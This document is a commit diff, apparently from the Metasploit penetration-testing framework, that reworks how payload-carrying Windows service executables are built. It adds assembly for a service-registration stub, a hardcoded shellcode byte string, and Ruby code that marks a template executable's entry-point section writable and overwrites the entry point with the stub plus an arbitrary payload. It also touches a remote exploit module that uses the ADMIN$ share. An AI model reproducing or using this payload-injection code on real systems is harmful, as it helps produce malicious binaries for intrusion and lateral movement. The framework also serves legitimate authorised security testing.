new service exe creation refreshed
Florian Gaultier
agix
parent
9cd6c5ef2b
commit
513f3de0f8
|
|
@ -0,0 +1,64 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: agix (florian.gaultier[at]gmail[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Size: 137 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
|
||||
push byte 0x0
|
||||
push 0x32336970
|
||||
push 0x61766461
|
||||
push esp
|
||||
push 0x726774c
|
||||
call ebp ;load advapi32.dll
|
||||
push 0x00454349
|
||||
push 0x56524553
|
||||
mov ecx, esp ;ServiceTableEntry.SVCNAME
|
||||
lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
|
||||
push 0x00000000
|
||||
push eax
|
||||
push ecx
|
||||
mov eax,esp
|
||||
push 0x00000000
|
||||
push eax
|
||||
push 0xCB72F7FA
|
||||
call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
|
||||
push 0x00000000
|
||||
push 0x56A2B5F0
|
||||
call ebp ;call ExitProcess(0)
|
||||
pop eax ;SvcCtrlHandler
|
||||
pop eax
|
||||
pop eax
|
||||
pop eax
|
||||
xor eax,eax
|
||||
ret
|
||||
cld ;SvcMain
|
||||
call me
|
||||
me:
|
||||
pop ebp
|
||||
sub ebp, 0xd6 ;ebp => hashFunction
|
||||
push 0x00464349
|
||||
push 0x56524553
|
||||
mov ecx, esp ;SVCNAME
|
||||
lea eax, [ebp+0xc9];SvcCtrlHandler
|
||||
push 0x00000000
|
||||
push eax
|
||||
push ecx
|
||||
push 0x5244AA0B
|
||||
call ebp ;RegisterServiceCtrlHandlerExA
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000000
|
||||
push 0x00000004
|
||||
push 0x00000010
|
||||
mov ecx, esp
|
||||
push 0x00000000
|
||||
push ecx
|
||||
push eax
|
||||
push 0x7D3755C6
|
||||
call ebp ;SetServiceStatus RUNNING
|
||||
|
|
@ -0,0 +1,17 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 189 bytes + strlen(libpath) + 1
|
||||
; Build: >build.py single_service_stuff
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
%include "./src/block/block_api.asm"
|
||||
start: ;
|
||||
pop ebp ; pop off the address of 'api_call' for calling later.
|
||||
%include "./src/block/block_service.asm"
|
||||
|
|
@ -392,32 +392,81 @@ require 'msf/core/exe/segment_injector'
|
|||
|
||||
case opts[:exe_type]
|
||||
when :service_exe
|
||||
exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
|
||||
max_length = 8192
|
||||
name = opts[:servicename]
|
||||
|
||||
if name
|
||||
bo = pe.index('SERVICENAME')
|
||||
raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
|
||||
pe[bo, 11] = [name].pack('a11')
|
||||
if not name
|
||||
name = Rex::Text.rand_text_alpha(7)
|
||||
end
|
||||
#code_service could be encoded in the future
|
||||
code_service =
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
|
||||
"\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" +
|
||||
"\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
|
||||
"\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
|
||||
"\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" +
|
||||
"\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" +
|
||||
"\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
|
||||
"\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
|
||||
"\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5"
|
||||
|
||||
pe_header_size=0x18
|
||||
section_size=0x28
|
||||
characteristics_offset=0x24
|
||||
virtualAddress_offset=0xc
|
||||
sizeOfRawData_offset=0x10
|
||||
|
||||
sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size
|
||||
sections_table_offset = exe.rva_to_file_offset(sections_table_rva)
|
||||
sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset)
|
||||
|
||||
sections_header = []
|
||||
exe._file_header.v['NumberOfSections'].times { |i|
|
||||
sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]]
|
||||
}
|
||||
|
||||
#look for section with entry point
|
||||
sections_header.each do |sec|
|
||||
virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
|
||||
sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
|
||||
characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
|
||||
if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddresssizeOfRawData
|
||||
#put this section writable
|
||||
characteristics|=0x80000000
|
||||
newcharacteristics = [characteristics].pack('L')
|
||||
pe[sec[0],newcharacteristics.length]=newcharacteristics
|
||||
end
|
||||
end
|
||||
|
||||
if not opts[:sub_method]
|
||||
pe[136, 4] = [rand(0x100000000)].pack('V')
|
||||
end
|
||||
#put the shellcode at the entry point, overwriting template
|
||||
pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code
|
||||
|
||||
when :dll
|
||||
max_length = 2048
|
||||
when :exe_sub
|
||||
max_length = 4096
|
||||
end
|
||||
|
||||
bo = pe.index('PAYLOAD:')
|
||||
raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
|
||||
if opts[:exe_type] != :service_exe
|
||||
|
||||
if (code.length <= max_length)
|
||||
pe[bo, code.length] = [code].pack("a*")
|
||||
else
|
||||
raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
|
||||
end
|
||||
bo = pe.index('PAYLOAD:')
|
||||
raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
|
||||
|
||||
if (code.length <= max_length)
|
||||
pe[bo, code.length] = [code].pack("a*")
|
||||
else
|
||||
raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
|
||||
end
|
||||
|
||||
if opts[:exe_type] == :dll
|
||||
mt = pe.index('MUTEX!!!')
|
||||
|
|
@ -464,7 +513,7 @@ require 'msf/core/exe/segment_injector'
|
|||
|
||||
def self.to_win32pe_service(framework, code, opts={})
|
||||
# Allow the user to specify their own service EXE template
|
||||
set_template_default(opts, "template_x86_windows_svc.exe")
|
||||
set_template_default(opts, "template_x86_windows.exe")
|
||||
opts[:exe_type] = :service_exe
|
||||
exe_sub_method(code,opts)
|
||||
end
|
||||
|
|
|
|||
|
|
@ -152,6 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Disconnect from the ADMIN$
|
||||
simple.disconnect("ADMIN$")
|
||||
else
|
||||
|
||||
servicename = rand_text_alpha(8)
|
||||
servicedescription = datastore['SERVICE_DESCRIPTION']
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue